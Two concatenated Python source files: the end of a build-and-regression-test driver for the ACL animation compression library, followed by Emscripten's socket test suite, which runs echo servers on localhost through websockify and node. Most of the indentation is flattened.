# Switch our working directory to where we built everything
working_dir = os.path.join(build_dir, 'tests', 'main_android')
os.chdir(working_dir)
gradlew_exe = os.path.join(working_dir, 'gradlew.bat')
# We uninstall first and then install
if args.config == 'Debug':
install_cmd = 'uninstallAll installDebug'
elif args.config == 'Release':
install_cmd = 'uninstallAll installRelease'
# Install our app
test_cmd = '"{}" {}'.format(gradlew_exe, install_cmd)
result = subprocess.call(test_cmd, shell=True)
if result != 0:
sys.exit(result)
# Execute through ADB
run_cmd = 'adb shell am start -n "com.acl.unit_tests/com.acl.unit_tests.MainActivity" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER'
result = subprocess.call(run_cmd, shell=True)
if result != 0:
sys.exit(result)
# Restore working directory
os.chdir(build_dir)
def do_tests_cmake(ctest_exe, args):
ctest_cmd = '"{}" --output-on-failure --parallel {}'.format(ctest_exe, args.num_threads)
if platform.system() == 'Windows' or platform.system() == 'Darwin':
ctest_cmd += ' -C {}'.format(args.config)
if args.tests_matching:
ctest_cmd += ' --tests-regex {}'.format(args.tests_matching)
result = subprocess.call(ctest_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_tests(build_dir, ctest_exe, args):
print('Running unit tests ...')
if args.compiler == 'android':
do_tests_android(build_dir, args)
else:
do_tests_cmake(ctest_exe, args)
def format_elapsed_time(elapsed_time):
hours, rem = divmod(elapsed_time, 3600)
minutes, seconds = divmod(rem, 60)
return '{:0>2}h {:0>2}m {:05.2f}s'.format(int(hours), int(minutes), seconds)
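# A minimal usage sketch of the helper above (illustrative only):
# 3725.5 seconds is 1 hour, 2 minutes and 5.5 seconds.
#
#   format_elapsed_time(3725.5)   # -> '01h 02m 05.50s'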
def print_progress(iteration, total, prefix='', suffix='', decimals = 1, bar_length = 40):
# Taken from https://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console
# With minor tweaks
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
bar_length - Optional : character length of bar (Int)
"""
str_format = "{0:." + str(decimals) + "f}"
percents = str_format.format(100 * (iteration / float(total)))
filled_length = int(round(bar_length * iteration / float(total)))
bar = '█' * filled_length + '-' * (bar_length - filled_length)
	# Clear any previously printed line first to avoid leaving visual artifacts behind
# Note that if this function is called too quickly, the text might flicker
terminal_width = 80
sys.stdout.write('{}\r'.format(' ' * terminal_width))
sys.stdout.flush()
sys.stdout.write('%s |%s| %s%s %s\r' % (prefix, bar, percents, '%', suffix)),
sys.stdout.flush()
if iteration == total:
sys.stdout.write('\n')
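# A minimal usage sketch for the progress bar above (illustrative only; the
# real call sites are in do_regression_tests_cmake below):
#
#   items = list(range(25))
#   for index, _item in enumerate(items):
#       # ... do some work for _item ...
#       print_progress(index + 1, len(items), 'Processing:', '{} / {}'.format(index + 1, len(items)))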
def do_prepare_regression_test_data(test_data_dir, args):
print('Preparing regression test data ...')
current_test_data_zip = os.path.join(test_data_dir, '{}.zip'.format(current_test_data))
# Validate that our regression test data is present
if not os.path.exists(current_test_data_zip):
print('Regression test data not found: {}'.format(current_test_data_zip))
return
# If it hasn't been decompressed yet, do so now
current_test_data_dir = os.path.join(test_data_dir, current_test_data)
needs_decompression = not os.path.exists(current_test_data_dir)
if needs_decompression:
print('Decompressing {} ...'.format(current_test_data_zip))
with zipfile.ZipFile(current_test_data_zip, 'r') as zip_ref:
zip_ref.extractall(test_data_dir)
# Grab all the test clips
regression_clips = []
for (dirpath, dirnames, filenames) in os.walk(current_test_data_dir):
for filename in filenames:
if not filename.endswith('.acl.sjson'):
continue
clip_filename = os.path.join(dirpath, filename)
regression_clips.append((clip_filename, os.path.getsize(clip_filename)))
if len(regression_clips) == 0:
print('No regression clips found')
sys.exit(1)
print('Found {} regression clips'.format(len(regression_clips)))
# Grab all the test configurations
test_configs = []
test_config_dir = os.path.join(test_data_dir, 'configs')
if os.path.exists(test_config_dir):
for (dirpath, dirnames, filenames) in os.walk(test_config_dir):
for filename in filenames:
if not filename.endswith('.config.sjson'):
continue
config_filename = os.path.join(dirpath, filename)
test_configs.append((config_filename, filename))
if len(test_configs) == 0:
print('No regression configurations found')
sys.exit(1)
print('Found {} regression configurations'.format(len(test_configs)))
# Sort the configs by name for consistency
test_configs.sort(key=lambda entry: entry[1])
	# Sort clips by size so that larger clips are tested first; this parallelizes better
regression_clips.sort(key=lambda entry: entry[1], reverse=True)
# Write our metadata file
with open(os.path.join(current_test_data_dir, 'metadata.sjson'), 'w') as metadata_file:
print('configs = [', file = metadata_file)
for config_filename, _ in test_configs:
print('\t"{}"'.format(os.path.relpath(config_filename, test_config_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
print('clips = [', file = metadata_file)
for clip_filename, _ in regression_clips:
print('\t"{}"'.format(os.path.relpath(clip_filename, current_test_data_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
return current_test_data_dir
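# For reference, the metadata.sjson written above has the following shape
# (entries are illustrative; the actual paths depend on the extracted test data):
#
#   configs = [
#       "uniformly_sampled_quant_medium.config.sjson"
#   ]
#
#   clips = [
#       "some_character_run.acl.sjson"
#   ]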
def do_prepare_decompression_test_data(test_data_dir, args):
print('Preparing decompression test data ...')
current_data_zip = os.path.join(test_data_dir, '{}.zip'.format(current_decomp_data))
	# Validate that our decompression test data is present
if not os.path.exists(current_data_zip):
print('Decompression test data not found: {}'.format(current_data_zip))
return
# If it hasn't been decompressed yet, do so now
current_data_dir = os.path.join(test_data_dir, current_decomp_data)
needs_decompression = not os.path.exists(current_data_dir)
if needs_decompression:
print('Decompressing {} ...'.format(current_data_zip))
with zipfile.ZipFile(current_data_zip, 'r') as zip_ref:
zip_ref.extractall(test_data_dir)
# Grab all the test clips
clips = []
for (dirpath, dirnames, filenames) in os.walk(current_data_dir):
for filename in filenames:
if not filename.endswith('.acl.bin'):
continue
clip_filename = os.path.join(dirpath, filename)
clips.append(clip_filename)
if len(clips) == 0:
print('No decompression clips found')
sys.exit(1)
print('Found {} decompression clips'.format(len(clips)))
# Grab all the test configurations
configs = []
config_dir = os.path.join(test_data_dir, 'configs')
if os.path.exists(config_dir):
for (dirpath, dirnames, filenames) in os.walk(config_dir):
for filename in filenames:
if not filename.endswith('.config.sjson'):
continue
if not filename == 'uniformly_sampled_quant_medium.config.sjson':
continue
config_filename = os.path.join(dirpath, filename)
configs.append(config_filename)
if len(configs) == 0:
print('No decompression configurations found')
sys.exit(1)
print('Found {} decompression configurations'.format(len(configs)))
# Write our metadata file
with open(os.path.join(current_data_dir, 'metadata.sjson'), 'w') as metadata_file:
print('configs = [', file = metadata_file)
for config_filename in configs:
print('\t"{}"'.format(os.path.relpath(config_filename, config_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
print('clips = [', file = metadata_file)
for clip_filename in clips:
print('\t"{}"'.format(os.path.relpath(clip_filename, current_data_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
return current_data_dir
def do_regression_tests_android(build_dir, args):
# Switch our working directory to where we built everything
working_dir = os.path.join(build_dir, 'tools', 'regression_tester_android')
os.chdir(working_dir)
gradlew_exe = os.path.join(working_dir, 'gradlew.bat')
# We uninstall first and then install
if args.config == 'Debug':
install_cmd = 'uninstallAll installDebug'
elif args.config == 'Release':
install_cmd = 'uninstallAll installRelease'
# Install our app
test_cmd = '"{}" {}'.format(gradlew_exe, install_cmd)
result = subprocess.call(test_cmd, shell=True)
if result != 0:
sys.exit(result)
# Execute through ADB
run_cmd = 'adb shell am start -n "com.acl.regression_tests/com.acl.regression_tests.MainActivity" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER'
result = subprocess.call(run_cmd, shell=True)
if result != 0:
sys.exit(result)
# Restore working directory
os.chdir(build_dir)
def do_regression_tests_cmake(ctest_exe, test_data_dir, args):
if sys.version_info < (3, 4):
print('Python 3.4 or higher needed to run regression tests')
sys.exit(1)
import queue
# Validate that our regression testing tool is present
if platform.system() == 'Windows':
compressor_exe_path = './bin/acl_compressor.exe'
else:
compressor_exe_path = './bin/acl_compressor'
compressor_exe_path = os.path.abspath(compressor_exe_path)
if not os.path.exists(compressor_exe_path):
print('Compressor exe not found: {}'.format(compressor_exe_path))
sys.exit(1)
# Grab all the test clips
regression_clips = []
current_test_data_dir = os.path.join(test_data_dir, current_test_data)
for (dirpath, dirnames, filenames) in os.walk(current_test_data_dir):
for filename in filenames:
if not filename.endswith('.acl.sjson'):
continue
clip_filename = os.path.join(dirpath, filename)
regression_clips.append((clip_filename, os.path.getsize(clip_filename)))
# Grab all the test configurations
test_configs = []
test_config_dir = os.path.join(test_data_dir, 'configs')
if os.path.exists(test_config_dir):
for (dirpath, dirnames, filenames) in os.walk(test_config_dir):
for filename in filenames:
if not filename.endswith('.config.sjson'):
continue
config_filename = os.path.join(dirpath, filename)
test_configs.append((config_filename, filename))
# Sort the configs by name for consistency
test_configs.sort(key=lambda entry: entry[1])
	# Sort clips by size so that larger clips are tested first; this parallelizes better
regression_clips.sort(key=lambda entry: entry[1], reverse=True)
# Iterate over every clip and configuration and perform the regression testing
for config_filename, _ in test_configs:
print('Performing regression tests for configuration: {}'.format(os.path.basename(config_filename)))
regression_start_time = time.perf_counter()
cmd_queue = queue.Queue()
completed_queue = queue.Queue()
failed_queue = queue.Queue()
failure_lock = threading.Lock()
for clip_filename, _ in regression_clips:
cmd = '"{}" -acl="{}" -test -config="{}"'.format(compressor_exe_path, clip_filename, config_filename)
if platform.system() == 'Windows':
cmd = cmd.replace('/', '\\')
cmd_queue.put((clip_filename, cmd))
# Add a marker to terminate the threads
for i in range(args.num_threads):
cmd_queue.put(None)
def run_clip_regression_test(cmd_queue, completed_queue, failed_queue, failure_lock):
while True:
entry = cmd_queue.get()
if entry is None:
return
(clip_filename, cmd) = entry
result = subprocess.call(cmd, shell=True)
if result != 0:
failed_queue.put((clip_filename, cmd))
failure_lock.acquire()
print('Failed to run regression test for clip: {}'.format(clip_filename))
print(cmd)
failure_lock.release()
completed_queue.put(clip_filename)
threads = [ threading.Thread(target = run_clip_regression_test, args = (cmd_queue, completed_queue, failed_queue, failure_lock)) for _i in range(args.num_threads) ]
for thread in threads:
thread.daemon = True
thread.start()
print_progress(0, len(regression_clips), 'Testing clips:', '{} / {}'.format(0, len(regression_clips)))
try:
while True:
for thread in threads:
thread.join(1.0)
num_processed = completed_queue.qsize()
print_progress(num_processed, len(regression_clips), 'Testing clips:', '{} / {}'.format(num_processed, len(regression_clips)))
all_threads_done = True
for thread in threads:
					if thread.is_alive():
all_threads_done = False
if all_threads_done:
break
except KeyboardInterrupt:
sys.exit(1)
regression_testing_failed = not failed_queue.empty()
regression_end_time = time.perf_counter()
print('Done in {}'.format(format_elapsed_time(regression_end_time - regression_start_time)))
if regression_testing_failed:
sys.exit(1)
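# The loop above drives a simple sentinel-terminated worker pool: one None
# marker per thread is queued so that every worker knows when to stop. A
# self-contained sketch of that pattern (not used by this script; `items` and
# `work` stand in for the clip list and the per-clip regression call):
def _sentinel_worker_pool_sketch(items, work, num_threads=4):
	import queue
	import threading
	pending = queue.Queue()
	for item in items:
		pending.put(item)
	for _ in range(num_threads):
		pending.put(None)  # one termination marker per worker
	def run():
		while True:
			entry = pending.get()
			if entry is None:
				return  # marker reached: no more work
			work(entry)
	workers = [threading.Thread(target=run) for _ in range(num_threads)]
	for worker in workers:
		worker.daemon = True
		worker.start()
	for worker in workers:
		worker.join()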
def do_regression_tests(build_dir, ctest_exe, test_data_dir, args):
print('Running regression tests ...')
if args.compiler == 'android':
do_regression_tests_android(build_dir, args)
else:
do_regression_tests_cmake(ctest_exe, test_data_dir, args)
if __name__ == "__main__":
args = parse_argv()
cmake_exe, ctest_exe = get_cmake_exes()
# Set the ACL_CMAKE_HOME environment variable to point to CMake
# otherwise we assume it is already in the user PATH
if 'ACL_CMAKE_HOME' in os.environ:
cmake_home = os.environ['ACL_CMAKE_HOME']
cmake_exe = os.path.join(cmake_home, 'bin', cmake_exe)
ctest_exe = os.path.join(cmake_home, 'bin', ctest_exe)
build_dir = os.path.join(os.getcwd(), 'build')
test_data_dir = os.path.join(os.getcwd(), 'test_data')
cmake_script_dir = os.path.join(os.getcwd(), 'cmake')
if args.clean and os.path.exists(build_dir):
print('Cleaning previous build ...')
shutil.rmtree(build_dir)
if not os.path.exists(build_dir):
os.makedirs(build_dir)
os.chdir(build_dir)
print('Using config: {}'.format(args.config))
print('Using cpu: {}'.format(args.cpu))
if args.compiler:
print('Using compiler: {}'.format(args.compiler))
print('Using {} threads'.format(args.num_threads))
regression_data_dir = do_prepare_regression_test_data(test_data_dir, args)
decomp_data_dir = do_prepare_decompression_test_data(test_data_dir, args)
do_generate_solution(cmake_exe, build_dir, cmake_script_dir, regression_data_dir, decomp_data_dir, args)
if args.build:
do_build(cmake_exe, args)
if args.unit_test:
do_tests(build_dir, ctest_exe, args)
if args.regression_test and not args.compiler == 'ios':
do_regression_tests(build_dir, ctest_exe, test_data_dir, args)
sys.exit(0)
|
test_sockets.py
|
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from __future__ import print_function
import multiprocessing
import os
import socket
import shutil
import sys
import time
if __name__ == '__main__':
raise Exception('do not run this file directly; do something like: tests/runner.py sockets')
import websockify
from runner import BrowserCore, no_windows, chdir, flaky
from tools import shared
from tools.shared import PYTHON, EMCC, NODE_JS, path_from_root, Popen, PIPE, WINDOWS, run_process, run_js, JS_ENGINES, CLANG_CC
npm_checked = False
NPM = os.path.join(os.path.dirname(NODE_JS[0]), 'npm.cmd' if WINDOWS else 'npm')
def clean_processes(processes):
for p in processes:
if (not hasattr(p, 'exitcode') or p.exitcode is None) and (not hasattr(p, 'returncode') or p.returncode is None):
# ask nicely (to try and catch the children)
try:
p.terminate() # SIGTERM
except:
pass
time.sleep(1)
# send a forcible kill immediately afterwards. If the process did not die before, this should clean it.
try:
p.kill() # SIGKILL
except:
pass
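# A minimal usage sketch for clean_processes above (illustrative only): it is
# meant for a mixed list of subprocess.Popen and multiprocessing.Process
# objects, asking each one to terminate before force-killing whatever is left.
#
#   p = Popen([os.path.abspath('server')])
#   try:
#       ...  # run the test against the server
#   finally:
#       clean_processes([p])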
class WebsockifyServerHarness(object):
def __init__(self, filename, args, listen_port, do_server_check=True):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.target_port = listen_port - 1
self.args = args or []
self.do_server_check = do_server_check
def __enter__(self):
# compile the server
# NOTE empty filename support is a hack to support
# the current test_enet
if self.filename:
proc = run_process([CLANG_CC, path_from_root('tests', self.filename), '-o', 'server', '-DSOCKK=%d' % self.target_port] + shared.get_clang_native_args() + self.args, env=shared.get_clang_native_env(), stdout=PIPE, stderr=PIPE)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen([os.path.abspath('server')])
self.processes.append(process)
# start the websocket proxy
print('running websockify on %d, forward to tcp %d' % (self.listen_port, self.target_port), file=sys.stderr)
wsp = websockify.WebSocketProxy(verbose=True, listen_port=self.listen_port, target_host="127.0.0.1", target_port=self.target_port, run_once=True)
self.websockify = multiprocessing.Process(target=wsp.start_server)
self.websockify.start()
self.processes.append(self.websockify)
# Make sure both the actual server and the websocket proxy are running
for i in range(10):
try:
if self.do_server_check:
server_sock = socket.create_connection(('localhost', self.target_port), timeout=1)
server_sock.close()
proxy_sock = socket.create_connection(('localhost', self.listen_port), timeout=1)
proxy_sock.close()
break
except:
time.sleep(1)
else:
clean_processes(self.processes)
raise Exception('[Websockify failed to start up in a timely manner]')
print('[Websockify on process %s]' % str(self.processes[-2:]))
def __exit__(self, *args, **kwargs):
# try to kill the websockify proxy gracefully
if self.websockify.is_alive():
self.websockify.terminate()
self.websockify.join()
# clean up any processes we started
clean_processes(self.processes)
class CompiledServerHarness(object):
def __init__(self, filename, args, listen_port):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.args = args or []
def __enter__(self):
# assuming this is only used for WebSocket tests at the moment, validate that
# the ws module is installed
global npm_checked
if not npm_checked:
child = run_process(NODE_JS + ['-e', 'require("ws");'], check=False)
assert child.returncode == 0, '"ws" node module not found. you may need to run npm install'
npm_checked = True
# compile the server
proc = run_process([PYTHON, EMCC, path_from_root('tests', self.filename), '-o', 'server.js', '-DSOCKK=%d' % self.listen_port] + self.args)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen(NODE_JS + ['server.js'])
self.processes.append(process)
def __exit__(self, *args, **kwargs):
# clean up any processes we started
clean_processes(self.processes)
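# Both harnesses above are used as context managers: entering builds and
# launches the echo server (natively behind a websockify proxy, or compiled to
# JS and run under node), and exiting tears the processes down. A minimal usage
# sketch (the port number is illustrative):
#
#   harness = CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [], 49999)
#   with harness:
#       pass  # drive the client test against harness.listen_port here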
# always run these tests last
# make sure to use different ports in each one because it takes a while for the processes to be cleaned up
class sockets(BrowserCore):
emcc_args = []
@classmethod
def setUpClass(self):
super(sockets, self).setUpClass()
print()
print('Running the socket tests. Make sure the browser allows popups from localhost.')
print()
def test_sockets_echo(self):
sockets_include = '-I' + path_from_root('tests', 'sockets')
# Note: in the WebsockifyServerHarness and CompiledServerHarness tests below, explicitly use consecutive server listen ports,
# because server teardown might not occur deterministically (python dtor time) and is a bit racy.
# WebsockifyServerHarness uses two port numbers, x and x-1, so increment it by two.
# CompiledServerHarness only uses one. Start with 49160 & 49159 as the first server port addresses. If adding new tests,
# increment the used port addresses below.
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49161), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49162), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1'], 49163), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 49160), 0)]
for harness, datagram in harnesses:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, sockets_include])
def test_sdl2_sockets_echo(self):
harness = CompiledServerHarness('sdl2_net_server.c', ['-s', 'USE_SDL=2', '-s', 'USE_SDL_NET=2'], 49164)
with harness:
self.btest('sdl2_net_client.c', expected='0', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_NET=2', '-DSOCKK=%d' % harness.listen_port])
def test_sockets_async_echo(self):
# Run with ./runner.py sockets.test_sockets_async_echo
sockets_include = '-I' + path_from_root('tests', 'sockets')
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ASYNC=1'], 49167), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1', '-DTEST_ASYNC=1'], 49168), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1', '-DTEST_ASYNC=1'], 49169), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_ASYNC=1'], 49166), 0)]
for harness, datagram in harnesses:
print('harness:', harness)
with harness:
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, '-DTEST_ASYNC=1', sockets_include])
# Deliberately attempt a connection on a port that will fail to test the error callback and getsockopt
print('expect fail')
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=49169', '-DTEST_ASYNC=1', sockets_include])
def test_sockets_echo_bigdata(self):
sockets_include = '-I' + path_from_root('tests', 'sockets')
# generate a large string literal to use as our message
message = ''
for i in range(256 * 256 * 2):
      message += chr(ord('a') + (i % 26))
# re-write the client test with this literal (it's too big to pass via command line)
input_filename = path_from_root('tests', 'sockets', 'test_sockets_echo_client.c')
input = open(input_filename).read()
output = input.replace('#define MESSAGE "pingtothepong"', '#define MESSAGE "%s"' % message)
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49172), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49173), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 49171), 0)]
for harness, datagram in harnesses:
with harness:
self.btest(output, expected='0', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram], force_c=True)
@flaky
@no_windows('This test is Unix-specific.')
def test_sockets_partial(self):
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_partial_server.c'), [], 49180),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_partial_server.c'), [], 49181)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_partial_client.c'), expected='165', args=['-DSOCKK=%d' % harness.listen_port])
@flaky
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_down(self):
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_select_server_down_server.c'), [], 49190, do_server_check=False),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_select_server_down_server.c'), [], 49191)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_select_server_down_client.c'), expected='266', args=['-DSOCKK=%d' % harness.listen_port])
@flaky
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_closes_connection_rw(self):
sockets_include = '-I' + path_from_root('tests', 'sockets')
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49200),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49201)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_select_server_closes_connection_client_rw.c'), expected='266', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port])
@no_windows('This test uses Unix-specific build architecture.')
def test_enet(self):
# this is also a good test of raw usage of emconfigure and emmake
shared.try_delete(self.in_dir('enet'))
shutil.copytree(path_from_root('tests', 'enet'), self.in_dir('enet'))
with chdir(self.in_dir('enet')):
run_process([PYTHON, path_from_root('emconfigure'), './configure'])
run_process([PYTHON, path_from_root('emmake'), 'make'])
enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + path_from_root('tests', 'enet', 'include')]
for harness in [
CompiledServerHarness(os.path.join('sockets', 'test_enet_server.c'), enet, 49210)
]:
with harness:
self.btest(os.path.join('sockets', 'test_enet_client.c'), expected='0', args=enet + ['-DSOCKK=%d' % harness.listen_port])
# This test is no longer in use for WebSockets as we can't truly emulate
# a server in the browser (in the past, there were some hacks to make it
  # somewhat work, but those have been removed). However, with WebRTC it
  # should be possible to resurrect this test.
# def test_enet_in_browser(self):
# shared.try_delete(self.in_dir('enet'))
# shutil.copytree(path_from_root('tests', 'enet'), self.in_dir('enet'))
# pwd = os.getcwd()
# os.chdir(self.in_dir('enet'))
# run_process([PYTHON, path_from_root('emconfigure'), './configure'])
# run_process([PYTHON, path_from_root('emmake'), 'make'])
# enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + path_from_root('tests', 'enet', 'include')]
# os.chdir(pwd)
# run_process([PYTHON, EMCC, path_from_root('tests', 'sockets', 'test_enet_server.c'), '-o', 'server.html', '-DSOCKK=2235'] + enet)
# def make_relay_server(port1, port2):
# print('creating relay server on ports %d,%d' % (port1, port2), file=sys.stderr)
# proc = run_process([PYTHON, path_from_root('tests', 'sockets', 'socket_relay.py'), str(port1), str(port2)])
# return proc
# with WebsockifyServerHarness('', [], 2235, 2234):
# with WebsockifyServerHarness('', [], 2237, 2236):
# pids = []
# try:
# proc = make_relay_server(2234, 2236)
# pids.append(proc.pid)
# self.btest(os.path.join('sockets', 'test_enet_client.c'), expected='0', args=['-DSOCKK=2237', '-DUSE_IFRAME=1'] + enet)
# finally:
# clean_pids(pids);
def test_webrtc(self): # XXX see src/settings.js, this is disabled pending investigation
self.skipTest('WebRTC support is not up to date.')
host_src = 'webrtc_host.c'
peer_src = 'webrtc_peer.c'
host_outfile = 'host.html'
peer_outfile = 'peer.html'
host_filepath = path_from_root('tests', 'sockets', host_src)
temp_host_filepath = os.path.join(self.get_dir(), os.path.basename(host_src))
with open(host_filepath) as f:
host_src = f.read()
with open(temp_host_filepath, 'w') as f:
f.write(self.with_report_result(host_src))
peer_filepath = path_from_root('tests', 'sockets', peer_src)
temp_peer_filepath = os.path.join(self.get_dir(), os.path.basename(peer_src))
with open(peer_filepath) as f:
peer_src = f.read()
with open(temp_peer_filepath, 'w') as f:
f.write(self.with_report_result(peer_src))
open(os.path.join(self.get_dir(), 'host_pre.js'), 'w').write('''
var Module = {
webrtc: {
broker: 'http://localhost:8182',
session: undefined,
onpeer: function(peer, route) {
window.open('http://localhost:8888/peer.html?' + route);
// iframe = document.createElement("IFRAME");
// iframe.setAttribute("src", "http://localhost:8888/peer.html?" + route);
// iframe.style.display = "none";
// document.body.appendChild(iframe);
peer.listen();
},
onconnect: function(peer) {
},
ondisconnect: function(peer) {
},
onerror: function(error) {
console.error(error);
}
},
setStatus: function(text) {
console.log('status: ' + text);
}
};
''')
open(os.path.join(self.get_dir(), 'peer_pre.js'), 'w').write('''
var Module = {
webrtc: {
broker: 'http://localhost:8182',
session: window.location.toString().split('?')[1],
onpeer: function(peer, route) {
peer.connect(Module['webrtc']['session']);
},
onconnect: function(peer) {
},
ondisconnect: function(peer) {
// Calling window.close() from this handler hangs my browser, so run it in the next turn
setTimeout(window.close, 0);
},
onerror: function(error) {
console.error(error);
},
},
setStatus: function(text) {
console.log('status: ' + text);
}
};
''')
run_process([PYTHON, EMCC, temp_host_filepath, '-o', host_outfile] + ['-s', 'GL_TESTING=1', '--pre-js', 'host_pre.js', '-s', 'SOCKET_WEBRTC=1', '-s', 'SOCKET_DEBUG=1'])
run_process([PYTHON, EMCC, temp_peer_filepath, '-o', peer_outfile] + ['-s', 'GL_TESTING=1', '--pre-js', 'peer_pre.js', '-s', 'SOCKET_WEBRTC=1', '-s', 'SOCKET_DEBUG=1'])
# note: you may need to run this manually yourself, if npm is not in the path, or if you need a version that is not in the path
run_process([NPM, 'install', path_from_root('tests', 'sockets', 'p2p')])
broker = Popen(NODE_JS + [path_from_root('tests', 'sockets', 'p2p', 'broker', 'p2p-broker.js')])
expected = '1'
self.run_browser(host_outfile, '.', ['/report_result?' + e for e in expected])
broker.kill()
def test_nodejs_sockets_echo(self):
# This test checks that sockets work when the client code is run in Node.js
# Run with ./runner.py sockets.test_nodejs_sockets_echo
if NODE_JS not in JS_ENGINES:
self.skipTest('node is not present')
sockets_include = '-I' + path_from_root('tests', 'sockets')
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 59162), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 59164), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59160), 0)]
# Basic test of node client against both a Websockified and compiled echo server.
for harness, datagram in harnesses:
with harness:
run_process([PYTHON, EMCC, path_from_root('tests', 'sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram], stdout=PIPE, stderr=PIPE)
out = run_js('client.js', engine=NODE_JS, full_output=True)
self.assertContained('do_msg_read: read 14 bytes', out)
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
# Test against a Websockified server with compile time configured WebSocket subprotocol. We use a Websockified
# server because as long as the subprotocol list contains binary it will configure itself to accept binary
# This test also checks that the connect url contains the correct subprotocols.
print("\nTesting compile time WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59166)
]:
with harness:
run_process([PYTHON, EMCC, path_from_root('tests', 'sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '-s', 'SOCKET_DEBUG=1', '-s', 'WEBSOCKET_SUBPROTOCOL="base64, binary"', '-DSOCKK=59166'], stdout=PIPE, stderr=PIPE)
out = run_js('client.js', engine=NODE_JS, full_output=True)
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained(['connect: ws://127.0.0.1:59166, base64,binary', 'connect: ws://127.0.0.1:59166/, base64,binary'], out)
